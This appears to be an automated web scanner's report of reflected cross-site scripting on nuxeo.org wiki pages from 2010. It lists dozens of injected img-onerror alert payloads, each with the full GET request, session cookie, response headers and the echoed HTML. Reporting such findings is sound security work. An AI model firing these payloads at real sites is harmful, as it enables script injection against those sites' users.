<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href="http://www.nuxeo.org/xwiki/bin/export/FAQ58367%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E5591b8e1ed1/DownloadingNuxeoSources?format=xar&name=FAQ58367"><img src=a onerror=alert(1)>5591b8e1ed1.DownloadingNuxeoSources&pages=FAQ58367"> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd998"><img%20src%3da%20onerror%3dalert(1)>abc85857786 was submitted in the REST URL parameter 5. This input was echoed as dd998"><img src=a onerror=alert(1)>abc85857786 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/view/FAQ/DownloadingNuxeoSourcesdd998"><img%20src%3da%20onerror%3dalert(1)>abc85857786 HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:18:26 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 13116 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href="http://www.nuxeo.org/xwiki/bin/export/FAQ/DownloadingNuxeoSourcesdd998%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3Eabc85857786?format=xar&name=FAQ.DownloadingNuxeoSourcesdd998"><img src=a onerror=alert(1)>abc85857786&pages=FAQ.DownloadingNuxeoSourcesdd998"> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 3aa95<img%20src%3da%20onerror%3dalert(1)>d376d3b62f2 was submitted in the REST URL parameter 5. This input was echoed as 3aa95<img src=a onerror=alert(1)>d376d3b62f2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/view/FAQ/DownloadingNuxeoSources3aa95<img%20src%3da%20onerror%3dalert(1)>d376d3b62f2 HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:19:00 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 13054 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href='http://www.nuxeo.org/xwiki/bin/view/FAQ/DownloadingNuxeoSources3aa95%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ed376d3b62f2'>DownloadingNuxeoSources3aa95<img src=a onerror=alert(1)>d376d3b62f2</a> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a33f4<img%20src%3da%20onerror%3dalert(1)>95c2826bc91 was submitted in the REST URL parameter 4. This input was echoed as a33f4<img src=a onerror=alert(1)>95c2826bc91 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/view/FAQa33f4<img%20src%3da%20onerror%3dalert(1)>95c2826bc91/LDAPSetup HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:17:05 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 12884 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href="http://www.nuxeo.org/xwiki/bin/view/FAQa33f4%3Cimg+src%3Da+onerror%3Dalert%281%29%3E95c2826bc91/">FAQa33f4<img src=a onerror=alert(1)>95c2826bc91</a> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c16a0"><img%20src%3da%20onerror%3dalert(1)>31ada847d4a was submitted in the REST URL parameter 4. This input was echoed as c16a0"><img src=a onerror=alert(1)>31ada847d4a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/view/FAQc16a0"><img%20src%3da%20onerror%3dalert(1)>31ada847d4a/LDAPSetup HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:16:15 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 12950 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href="http://www.nuxeo.org/xwiki/bin/export/FAQc16a0%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E31ada847d4a/LDAPSetup?format=xar&name=FAQc16a0"><img src=a onerror=alert(1)>31ada847d4a.LDAPSetup&pages=FAQc16a0"> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5070b"><img%20src%3da%20onerror%3dalert(1)>fc9a2887578 was submitted in the REST URL parameter 5. This input was echoed as 5070b"><img src=a onerror=alert(1)>fc9a2887578 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/view/FAQ/LDAPSetup5070b"><img%20src%3da%20onerror%3dalert(1)>fc9a2887578 HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:17:53 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 12934 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href="http://www.nuxeo.org/xwiki/bin/export/FAQ/LDAPSetup5070b%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3Efc9a2887578?format=xar&name=FAQ.LDAPSetup5070b"><img src=a onerror=alert(1)>fc9a2887578&pages=FAQ.LDAPSetup5070b"> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 8e8b8<img%20src%3da%20onerror%3dalert(1)>61eca1214c4 was submitted in the REST URL parameter 5. This input was echoed as 8e8b8<img src=a onerror=alert(1)>61eca1214c4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/view/FAQ/LDAPSetup8e8b8<img%20src%3da%20onerror%3dalert(1)>61eca1214c4 HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:18:38 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 12872 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href='http://www.nuxeo.org/xwiki/bin/view/FAQ/LDAPSetup8e8b8%3Cimg+src%3Da+onerror%3Dalert%281%29%3E61eca1214c4'>LDAPSetup8e8b8<img src=a onerror=alert(1)>61eca1214c4</a> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 883c9"><img%20src%3da%20onerror%3dalert(1)>af89e0dea9c was submitted in the REST URL parameter 4. This input was echoed as 883c9"><img src=a onerror=alert(1)>af89e0dea9c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 5aa3d<img%20src%3da%20onerror%3dalert(1)>dfd0885cdbe was submitted in the REST URL parameter 4. This input was echoed as 5aa3d<img src=a onerror=alert(1)>dfd0885cdbe in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d8263<img%20src%3da%20onerror%3dalert(1)>e718aef40bc was submitted in the REST URL parameter 4. This input was echoed as d8263<img src=a onerror=alert(1)>e718aef40bc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/view/Maind8263<img%20src%3da%20onerror%3dalert(1)>e718aef40bc/Ajax4JSF+Good+practices HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:14:32 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 13083 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href="http://www.nuxeo.org/xwiki/bin/view/Maind8263%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ee718aef40bc/">Maind8263<img src=a onerror=alert(1)>e718aef40bc</a> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4463e"><img%20src%3da%20onerror%3dalert(1)>9bc0f92181 was submitted in the REST URL parameter 4. This input was echoed as 4463e"><img src=a onerror=alert(1)>9bc0f92181 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/view/Main4463e"><img%20src%3da%20onerror%3dalert(1)>9bc0f92181/Ajax4JSF+Good+practices HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:13:31 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 13136 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href="http://www.nuxeo.org/xwiki/bin/export/Main4463e%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E9bc0f92181/Ajax4JSF+Good+practices?format=xar&name=Main4463e"><img src=a onerror=alert(1)>9bc0f92181.Ajax4JSF Good practices&pages=Main4463e"> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 11711"><img%20src%3da%20onerror%3dalert(1)>f6ef0055e76 was submitted in the REST URL parameter 5. This input was echoed as 11711"><img src=a onerror=alert(1)>f6ef0055e76 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/view/Main/Ajax4JSF+Good+practices11711"><img%20src%3da%20onerror%3dalert(1)>f6ef0055e76 HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:15:20 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 13133 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href="http://www.nuxeo.org/xwiki/bin/export/Main/Ajax4JSF+Good+practices11711%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ef6ef0055e76?format=xar&name=Main.Ajax4JSF Good practices11711"><img src=a onerror=alert(1)>f6ef0055e76&pages=Main.Ajax4JSF Good practices11711"> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload bbc96<img%20src%3da%20onerror%3dalert(1)>aa677fb915a was submitted in the REST URL parameter 5. This input was echoed as bbc96<img src=a onerror=alert(1)>aa677fb915a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/view/Main/Ajax4JSF+Good+practicesbbc96<img%20src%3da%20onerror%3dalert(1)>aa677fb915a HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:16:00 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 13071 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href='http://www.nuxeo.org/xwiki/bin/view/Main/Ajax4JSF+Good+practicesbbc96%3Cimg+src%3Da+onerror%3Dalert%281%29%3Eaa677fb915a'>Ajax4JSF Good practicesbbc96<img src=a onerror=alert(1)>aa677fb915a</a> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37093"><img%20src%3da%20onerror%3dalert(1)>9c0dc50f03a was submitted in the REST URL parameter 4. This input was echoed as 37093"><img src=a onerror=alert(1)>9c0dc50f03a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/view/Main37093"><img%20src%3da%20onerror%3dalert(1)>9c0dc50f03a/AllDocs HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:35:37 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 12937 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href="http://www.nuxeo.org/xwiki/bin/export/Main37093%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E9c0dc50f03a/AllDocs?format=xar&name=Main37093"><img src=a onerror=alert(1)>9c0dc50f03a.AllDocs&pages=Main37093"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a70b0<img%20src%3da%20onerror%3dalert(1)>7ba7318d99e was submitted in the REST URL parameter 4. This input was echoed as a70b0<img src=a onerror=alert(1)>7ba7318d99e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/view/Maina70b0<img%20src%3da%20onerror%3dalert(1)>7ba7318d99e/AllDocs HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:35:50 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 12871 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href="http://www.nuxeo.org/xwiki/bin/view/Maina70b0%3Cimg+src%3Da+onerror%3Dalert%281%29%3E7ba7318d99e/">Maina70b0<img src=a onerror=alert(1)>7ba7318d99e</a> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload f07c4<img%20src%3da%20onerror%3dalert(1)>404e6f1a573 was submitted in the REST URL parameter 5. This input was echoed as f07c4<img src=a onerror=alert(1)>404e6f1a573 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/view/Main/AllDocsf07c4<img%20src%3da%20onerror%3dalert(1)>404e6f1a573 HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:36:08 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 12859 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href='http://www.nuxeo.org/xwiki/bin/view/Main/AllDocsf07c4%3Cimg+src%3Da+onerror%3Dalert%281%29%3E404e6f1a573'>AllDocsf07c4<img src=a onerror=alert(1)>404e6f1a573</a> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e77a3"><img%20src%3da%20onerror%3dalert(1)>5736c0fdff5 was submitted in the REST URL parameter 5. This input was echoed as e77a3"><img src=a onerror=alert(1)>5736c0fdff5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/view/Main/AllDocse77a3"><img%20src%3da%20onerror%3dalert(1)>5736c0fdff5 HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
